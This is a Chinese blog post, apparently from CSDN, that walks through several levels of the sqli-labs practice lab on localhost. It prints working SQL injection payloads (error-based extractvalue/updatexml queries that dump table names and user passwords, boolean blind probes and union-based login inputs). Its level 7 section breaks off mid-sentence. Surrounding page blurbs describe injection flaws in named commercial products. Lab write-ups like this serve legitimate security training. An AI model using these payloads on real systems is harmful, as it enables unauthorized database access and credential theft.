sql复现

最新推荐文章于 2024-10-02 00:27:17 发布
最新推荐文章于 2024-10-02 00:27:17 发布
阅读量333 收藏 3
点赞数 4
文章标签: 数据库 mybatis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sml1692812762/article/details/141112440
版权

目录

less6

less7

Less8

 Less11

Less13

less6

进入靶场第关。加入参数id

字符串型,数字型都报错,尝试报错注入​​​​​​查询数据库

http://localhost/sqli-labs-php7-master/Less-6?id=1" and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+

查询数据库下表

http://localhost/sqli-labs-php7-master/Less-6/?id=1%22%20and%20extractvalue(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),0x7e))%20--+

查看users表下字段:

http://localhost/sqli-labs-php7-master/Less-6/?id=1%22%20and%20extractvalue(1,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27),0x7e))%20--+

 

 查看字段下的所有数据

http://localhost/sqli-labs-php7-master/Less-6/?id=1%22%20%20and%20extractvalue(1,concat(0x7e,(select%20group_concat(id,0x7e,username,0x7e,password)%20from%20users),0x7e))%20--+

less7

进入靶场第七关。加入参数id

判断闭合为 -存在'))闭合

使用联合查询 union select 将一句话木

Less8

使用 ')) 来闭合,但是它却没有报错

 ​​​​

输入id为1,则会显示

 

针对这种的显示,无论是联合查询还是报错注入都无法注入成功的,这里就要使用布尔盲注了,这种页面只会显示成功和错误两个状态的页面,可以通过布尔盲注来不断尝试猜测出数据,并且我们可以使用多种方法来注入: 手工注入和sqlmap工具

利用函数我们可以通过不断的变换范围来观察页面的响应来不断判断,直到判断到最后可以确定到一个值,比如我们可以先使用 length函数 + 二分法来尝试一下

?id=1' and (select length(database())>1) and 1=1  --+ //true
?id=1' and (select length(database())>10) and 1=1  --+  //flase
?id=1' and (select length(database())>5) and 1=1  --+ //true
?id=1' and (select length(database())>6) and 1=1  --+ //true
?id=1' and (select length(database())>8) and 1=1  --+ //flase

 

最终可以得到数据库的名称的长度为7, 得到了数据库的长度后 我们就可以再利用ascii函数+substr函数来修改字符串的范围 最终判断数据库的各个字符的ascii的值 最终就可以得到完整的数据库名称 比如:

?id=1' and ((select ascii(substr(database(),1,1)))>100) --+ //true
?id=1' and ((select ascii(substr(database(),1,1)))>200) --+ //flase

 Less11

输入1报错了存在注入

aaa' union select 1,2 #
aaa

 

输入的用户名和密码属于第1列和第2列

aaa' union select 1,database() #
aaa

Less13

我们尝试闭合一下 '),可以看到这里报错了,说明存在注入点

 

 查询数据库名

admin') union select updatexml(1,concat(0x7e,(database()),0x7e),1) #

 

查询数据库表名

admin') union select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#

刚睡醒的网工
关注
ERPNext SQL 注入漏洞复现
0xSec
12-05 957
ERPNext frappe.model.db_query.get_list 文件 filters 参数存在 SQL 注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
rat-sql:从英语到SQL的关系感知语义解析模型
02-03
RAT-SQL 该存储库包含ACL 2020论文。 如果您在工作中使用RAT-SQL,请按以下方式引用: @inproceedings { rat-sql , title = " {RAT-SQL}: Relation-Aware Schema Encoding and Linking for Text-to-{SQL} ...
网络安全之SQL注入漏洞复现(中篇)(技术进阶)
weixin_70911257的博客
04-21 1469
在我们手工注入时,我们应当根据实际情况判断用那种注入,以及要知道每一种注入方法的原理,手工注入固然慢,但是这才是灵魂所在,使用sqlmap工具虽然高效但是没有灵魂嘞。
网络安全之SQL注入漏洞复现(上篇)(技术进阶)
weixin_70911257的博客
04-12 1685
SQL注入(SQL Injection)是一种常见的网络攻击手段,是因为应用程序对用户输入的数据验证不到位造成的。攻击者在应用程序的输入字段中插入恶意的SQL代码,在应用程序未授权的情况下执行任意的SQL语句。
畅捷通CRM SQL注入漏洞复现
zzf011900的博客
11-10 232
输入语句验证是否有sql注入。
DVWA SQL注入漏洞复现
ch258563的博客
04-02 410
DVWA SQL注入漏洞复现
通达OA 11.5 SQL注入漏洞复现
zzf011900的博客
11-10 545
sqlmap 的payload:布尔盲注:link_type=false&slot={}&id=(SELECT (CASE WHEN (2489=2489) THEN 2 ELSE (SELECT 2530 UNION SELECT 6370) END))link_type=false&slot={}&id=2,用burp抓包。
vulhub靶场sql注入漏洞复现
赵花花08042的博客
12-13 3388
Django JSONField/HStoreField SQL注入漏洞(CVE-2019-14234) https://github.com/vulhub/vulhub/blob/master/django/CVE-2019-14234/README.zh-cn.md https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247483996&idx=1&sn=4254dc0a54003cccb29dd42935f8ccea.
joomla3.7.0sql注入漏洞复现
SUPER131110的博客
08-30 421
[在这里插入图片描述](https://img-blog.csdnimg.cn/在这里插入图片描述。
sql注入漏洞复现
WTT001的博客
08-04 208
下面这个漏洞已经是很久之前的了,现在已经是修复了,当时还是太年轻了......好了,有关SRC,EDU漏洞的话题,都可以随时来骚扰我( ﹡ˆoˆ﹡ )当时复现过程没有做好,截图也已经删掉了......我是在漏洞盒子上提交的,能不能通过看运气吧。从这就已经说明是sql数字型注入了。存在布尔盲注,时间盲注......上sqlmap验证一下。and 1=1 正常。and 1=2 报错。
用友U8 Cloud SQL注入漏洞复现
12-06 578
用友U8 Cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型企业,提供企业级云ERP整体解决方案。
强网杯SQL题目复现php.zip
12-17
标签中的“强网杯SQL题目复现”再次强调这是为了解决特定竞赛中的SQL挑战。 【压缩包子文件的文件名称列表】: 1. README.md:这是一个Markdown格式的文档,通常包含项目简介、使用说明、安装步骤等内容,对于理解...
点评项目-2-完善注册登录业务
m0_75138009的博客
09-29 555
需要处理的业务:在网页发送 /user/code 路径下的 post 请求后,我们需要检验手机号后,向合法的手机号发送一个随机生成的电话号。
World of Warcraft [CLASSIC][80][Grandel] Call to Arms: Victory in Wintergrasp
最新发布
qq 117791303
10-02 267
Wintergrasp 冬拥湖 120 VS 120
Spring的热部署工具和数据库密码加盐操作
2301_77053417的博客
09-28 749
加密过程:用户输入的密码+盐值 --> 字符串1,然后使用md5对字符串1加密得到字符串2,然后字符串2+盐值 --> 字符串3,这个字符串3就是存储在数据库中的密文。背景:如果我们的密码明文存储在数据库中,要是被窃取了是非常的危险的,所以我们在数据库中存储的密码不能是明文的,需要进行加密后存储,也就是数据库中存储的是密文。解密过程:取出数据库中的盐值和用户输入的密码得到字符串1,使用md5对字符串1加密得到字符串2,然后验证字符串2和数据库中的密文即可。做好以上的步骤,你项目中的热部署就已经做好了。
Redis事务
zhzjn的博客
09-30 345
Redis事务可以通过MULTI、EXEC、WATCH和DISCARD指令来实现。1. MULTI指令:表示事务的开始,之后的所有指令都会被逐一记录,但不会立即执行。2. EXEC指令:表示事务的执行,会按照记录的指令逐一执行。3. WATCH指令:可以监视一个或多个键的变化,如果在事务执行期间被其他客户端修改,事务会被回滚。4. DISCARD指令:表示事务的撤销,可以放弃之前记录的指令。
【RocketMQ】RocketMQ应用难点
记录一名在读研究生的学习笔记、感悟、开发产物
09-30 863
本文探讨了RocketMQ中消息重复消费的问题及其解决方案,尤其是在CLUSTERING模式下的扩容影响。文章分析了重复消费的原因,如广播模式、负载均衡模式下的多consumerGroup消费、消费者组内的动态变化及网络延迟等,并提出了利用唯一标识进行去重的方法。此外,还讨论了如何选择合适的存储机制以高效处理大量消息标识,如HashMap、MySQL、Redis以及推荐的布隆过滤器等方案。对于防止消息堆积与确保消息不丢失,也给出了相应的策略和技术措施。
IT基础监控范围和对象
MXsoft618的博客
09-29 582
综上所述,监控易的监控范围非常广泛,几乎涵盖了所有主流的IT基础设施以及相关的设备和系统。通过全面、实时、准确的监控功能,监控易为运维团队提供了强大的支持,帮助他们及时发现并解决潜在的问题,确保业务系统的稳定运行和高效运维。除了上述监控范围外,监控易还支持其他扩展监控功能,如被动式设备监控、自定义脚本监控、高级监测点监控等。监控易作为一款由美信时代独立自主研发的分布式一体化集中监控平台,其监控范围极为广泛,几乎涵盖了所有主流的IT基础设施以及相关的设备和系统。
MQTT--EMQX入门+MQTTX使用
CJPSR的博客
09-30 1098
EMQ X基于 Erlang/OTP 平台开发的MQTT 消息服务器,是开源社区中最流行的 MQTT 消息服务器。EMQ X 是开源百万级分布式。
wordpress sql注入复现
04-29
WordPress SQL注入漏洞是指攻击者通过构造恶意SQL语句,利用WordPress的SQL查询接口,成功地向WordPress数据库中插入或者篡改数据,甚至可以直接获取管理员权限。以下是一个简单的复现过程: 1. 在WordPress网站的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值